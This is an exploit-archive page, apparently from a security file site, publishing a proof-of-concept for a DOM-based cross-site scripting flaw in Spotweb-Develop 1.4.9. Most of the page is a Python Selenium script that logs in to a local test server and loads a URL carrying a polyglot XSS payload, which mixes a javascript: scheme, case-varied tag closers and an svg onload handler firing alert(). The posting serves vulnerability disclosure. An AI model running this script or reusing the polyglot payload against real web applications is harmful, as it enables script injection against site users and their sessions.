Spotweb-Develop 1.4.9 Cross Site Scripting

Spotweb-Develop 1.4.9 Cross Site Scripting: Posted May 20, 2021; Authored by nu11secur1ty; Spotweb-Develop version 1.4.9 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | edc08c2a5faaffc264b7ebd53bd4a33e8c3c676b0c81127f6aa98fce2d4127ad; Download | Favorite | View

Spotweb-Develop 1.4.9 Cross Site Scripting

# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty $ OWASP-ZAP
# Date: 05.20.2021
# Vendor: https://www.nzbserver.com/
# Link: https://github.com/spotweb/spotweb
# CVE: 2021-XXXX
# Proof: https://streamable.com/hix5o1

[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-XXXX

from selenium import webdriver
import time
import os, sys


# Vendor: https://www.nzbserver.com/
# Jump over login form :D
website_link="
https://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="loginform[username]"

#enter the element for password input field
element_for_password="loginform[password]"

#enter the element for submit button
element_for_submit="loginform[submitlogin]"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(3)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit Cross Site Scripting (DOM Based)
# Payload: #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

time.sleep(1)
# Payload link "esc-rule"
browser.get(("
https://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'""))

print("The payload is deployed DOM is BOMing you ':))'...\n")
os.system('pause')

browser.close()

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("DOM...")

---------------------------------

# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9
# Date: 05.20.2021
# Exploit Authotr idea: nu11secur1ty
# Exploit Debugging: nu11secur1ty & OWASP-ZAP
# Vendor Homepage: https://www.nzbserver.com/
# Software Link: https://github.com/spotweb/spotweb/releases

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-SPOTWEB-SXX-DOM

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 173 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

Spotweb-Develop 1.4.9 Cross Site Scripting

Spotweb-Develop 1.4.9 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Spotweb-Develop 1.4.9 Cross Site Scripting

Share This

Spotweb-Develop 1.4.9 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems